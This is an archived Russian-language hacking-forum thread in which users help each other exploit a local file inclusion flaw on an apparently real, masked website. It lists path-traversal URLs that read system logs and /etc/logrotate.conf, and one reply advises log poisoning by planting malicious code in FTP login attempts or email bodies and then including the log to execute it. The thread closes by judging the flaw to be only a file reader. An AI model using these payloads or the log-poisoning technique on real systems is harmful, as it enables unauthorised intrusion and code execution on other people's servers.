Просмотр полной версии : Помощь в раскрутке LFI
vikler said:
вот, что удалось найти, но всё не то, да?
Code:
http://XXXXXXXXXX/ShowPage?vuln=../../../Tomcat-name/webapps/name/logs/20130727.log
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.1
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.0
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.2
http://XXXXXXXXXX/ShowPage?vuln=../../../var/log/messages.3
http://XXXXXXXXXX/ShowPage?vuln=../../../etc/logrotate.conf
посмотри, пишутся ли в те логи ошибки
Поищи логи FTP, почту, в случае с FTP иногда ведется логирование логина, пароля при неудачном входе. Если так, то подставляй вместо логина от FTP свой ядовитый код и производи инклуд. В случае с почтой подобным образом, но дело с телом сообщения.
Вот тебе пути к логам wiki.apache.org/httpd/DistrosDefaultLayout
найдёшь пиши
Это оказалась читалка файлов, а не LFI.
Кроме просмотра конфигов - дело труба.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot